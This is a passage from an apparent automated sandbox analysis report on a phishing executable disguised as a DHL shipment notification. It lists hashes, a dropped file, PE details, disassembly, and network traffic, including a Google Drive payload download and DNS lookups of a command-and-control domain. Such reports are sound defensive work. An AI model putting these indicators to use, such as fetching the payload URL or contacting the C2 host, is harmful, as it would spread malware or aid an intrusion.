	DOC209272621615.PDF.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-40567503.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	ATT14851.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	WMHighfield.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	5WJw8YWsvu.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	FACTURAS.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-107262298.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	products samples pdf.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-1202816963.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	draft_inv dec21.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	Nh3xqMPynb.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	#Encoder_n1.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161

Dropped Files

No context

Created / dropped Files

C:\ProgramData\images.exe Download File
Process:	C:\Users\user\Desktop\DHL Express shipment notification.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	152728
Entropy (8bit):	5.288330717800927
Encrypted:	false
SSDEEP:	1536:bSyEql7Tg8Xxo5HCSJndCcIVdPsw4Jaev0Cq5pg:WyEql7Tg6hhTdkHwphg
MD5:	26E034A56F86ED41CB3E869095EC73B7
SHA1:	A74551CE377AADBAAE0B31B54B2536DAAA832754
SHA-256:	60AB75A94E04AA5DFAB1A68DA060A817E9F5CCB79F8A93D0C3DBFE47CB526B7D
SHA-512:	283EB6C75E024FAC46085EA526B96844466B6B27861DBE047D37D3BDE1D59E207241426B812030E8CB22D45441D6F4BDFD5C6D841B39EB21C9AC01BD7B0B346D
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 25%, Browse Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L...\|a.T.....................0............... ....@..........................P.......{..........................................(....@..X............@......................................................(... .......4............................text............................... ..`.data...,.... ....... ..............@....rsrc...X....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\images.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\DHL Express shipment notification.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.288330717800927
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL Express shipment notification.exe
File size:	152728
MD5:	26e034a56f86ed41cb3e869095ec73b7
SHA1:	a74551ce377aadbaae0b31b54b2536daaa832754
SHA256:	60ab75a94e04aa5dfab1a68da060a817e9f5ccb79f8a93d0c3dbfe47cb526b7d
SHA512:	283eb6c75e024fac46085ea526b96844466b6b27861dbe047d37d3bde1d59e207241426b812030e8cb22d45441d6f4bdfd5c6d841b39eb21c9ac01bd7b0b346d
SSDEEP:	1536:bSyEql7Tg8Xxo5HCSJndCcIVdPsw4Jaev0Cq5pg:WyEql7Tg6hhTdkHwphg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...\|a.T.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54B7617C [Thu Jan 15 06:43:08 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/12/2021 12:31:58 01/12/2022 12:31:58
Subject Chain	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Version:	3
Thumbprint MD5:	6E23C2E0F1EAA5736459B248CD4F244F
Thumbprint SHA-1:	3EF79B4748A2F5E9C61B979020E0070FCAB22AF2
Thumbprint SHA-256:	1252758943828E279B0955645D9BFE6EBC24BAB29368FB5EFDC213D5B615F3A0
Serial:	00

Entrypoint Preview

Instruction
push 004019C8h
call 00007FCA889D0A05h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+6C9B95C0h], dl
jle 00007FCA889D09C5h
dec eax
movsb
xor esp, ebp
add al, 17h
xchg dword ptr [ebx], eax
xchg dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+6Fh], dl
jnc 00007FCA889D0A85h
jnc 00007FCA889D0A86h
imul ebp, dword ptr [edi+6Eh], 00000073h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [ebp+27D3B3C4h], bh
sahf
inc eax
xchg dword ptr [ebp-3053F3DEh], ebp
das
cmp ch, byte ptr [ebx+29A901E3h]
jo 00007FCA889D09DEh
inc edi
xchg eax, edx
js 00007FCA889D0A13h
fsub dword ptr [ecx+3A5A13C6h]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esi
add byte ptr [eax], al
add byte ptr [ecx+00h], dl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [ebx+70h], dh
popad
je 00007FCA889D0A7Ah
popad
insb
add byte ptr [4A000F01h], cl
outsd
bound ebp, dword ptr [ebp+75h]
insb
imul esp, dword ptr [edi+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x218b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x958	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1498
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20fa4	0x21000	False	0.377485795455	data	5.3781600227	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x958	0x1000	False	0.173828125	data	2.03797872425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24828	0x130	data
RT_ICON	0x24540	0x2e8	data
RT_ICON	0x24418	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x243e8	0x30	data
RT_VERSION	0x24150	0x298	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	Slesk8
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	Slesk8.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-19:26:28.787414	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:25:24.739118099 CET	80	49674	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:24.739348888 CET	49674	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:31.745023012 CET	80	49689	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:31.745553970 CET	49689	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:33.942204952 CET	80	49694	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:33.942389965 CET	49694	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:37.544254065 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.544349909 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.544497967 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.566915989 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.566970110 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.618716002 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.618901014 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.620765924 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.620925903 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.759744883 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.759810925 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.760510921 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.760644913 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.764530897 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.807816982 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264718056 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264893055 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.264919043 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264981985 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.265098095 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.265301943 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.315473080 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.315534115 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.403029919 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403107882 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.403270960 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403641939 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403700113 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.455162048 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.455315113 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.455543995 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.457258940 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.457540989 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.462654114 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.462713957 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.463036060 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.463254929 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.467459917 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.507890940 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.765798092 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.765993118 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766041040 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766331911 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.766577005 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766937971 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.767194986 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.768460035 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.768719912 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.768778086 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.768996954 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.769073009 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.769393921 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.769449949 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.769726992 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776184082 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776380062 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776395082 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776428938 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776664972 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776700974 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776726007 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776981115 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.777247906 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.777494907 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.777543068 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.777828932 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778067112 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.778305054 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778352022 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.778595924 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778821945 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779042006 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779095888 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779293060 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779491901 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779721022 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779761076 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780180931 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780324936 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780533075 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780569077 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780764103 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780808926 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781013012 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781042099 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781331062 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781672001 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781819105 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781853914 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782047033 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.782329082 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782526970 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782603979 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.782644033 CET	443	49741	216.58.212.161	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:25:37.520550013 CET	56999	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:25:37.530525923 CET	53	56999	1.1.1.1	192.168.11.20
Dec 1, 2021 19:25:38.368060112 CET	60798	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:25:38.401494026 CET	53	60798	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:21.866683960 CET	50331	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:21.901261091 CET	53	50331	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:22.148561001 CET	56676	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:22.172840118 CET	53	56676	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:26.858731031 CET	59409	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:27.870095968 CET	59409	53	192.168.11.20	9.9.9.9
Dec 1, 2021 19:26:28.348496914 CET	53	59409	9.9.9.9	192.168.11.20
Dec 1, 2021 19:26:28.787271976 CET	53	59409	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 19:25:37.520550013 CET	192.168.11.20	1.1.1.1	0x3431	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:25:38.368060112 CET	192.168.11.20	1.1.1.1	0xdcf0	Standard query (0)	doc-10-6k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:21.866683960 CET	192.168.11.20	1.1.1.1	0xb93e	Standard query (0)	doc-0c-74-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:22.148561001 CET	192.168.11.20	1.1.1.1	0x3016	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:26.858731031 CET	192.168.11.20	1.1.1.1	0x5739	Standard query (0)	A2Q.my.to	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:27.870095968 CET	192.168.11.20	9.9.9.9	0x5739	Standard query (0)	A2Q.my.to	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 19:25:37.530525923 CET	1.1.1.1	192.168.11.20	0x3431	No error (0)	drive.google.com		142.250.185.206	A (IP address)	IN (0x0001)
Dec 1, 2021 19:25:38.401494026 CET	1.1.1.1	192.168.11.20	0xdcf0	No error (0)	doc-10-6k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:25:38.401494026 CET	1.1.1.1	192.168.11.20	0xdcf0	No error (0)	googlehosted.l.googleusercontent.com		216.58.212.161	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:21.901261091 CET	1.1.1.1	192.168.11.20	0xb93e	No error (0)	doc-0c-74-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:26:21.901261091 CET	1.1.1.1	192.168.11.20	0xb93e	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:22.172840118 CET	1.1.1.1	192.168.11.20	0x3016	No error (0)	docs.google.com		142.250.186.78	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:28.348496914 CET	9.9.9.9	192.168.11.20	0x5739	No error (0)	A2Q.my.to		194.85.248.156	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:28.787271976 CET	1.1.1.1	192.168.11.20	0x5739	No error (0)	A2Q.my.to		194.85.248.156	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-10-6k-docs.googleusercontent.com

doc-0c-74-docs.googleusercontent.com

docs.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49740	142.250.185.206	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:25:37 UTC	0	OUT	GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-01 18:25:38 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:25:38 GMT Location: https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-K8Pkv2XnGRA8kk8CYPxzUg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y; expires=Thu, 02-Jun-2022 18:25:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 18:25:38 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 30 2d 36 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 34 74 69 70 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tip
2021-12-01 18:25:38 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49741	216.58.212.161	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
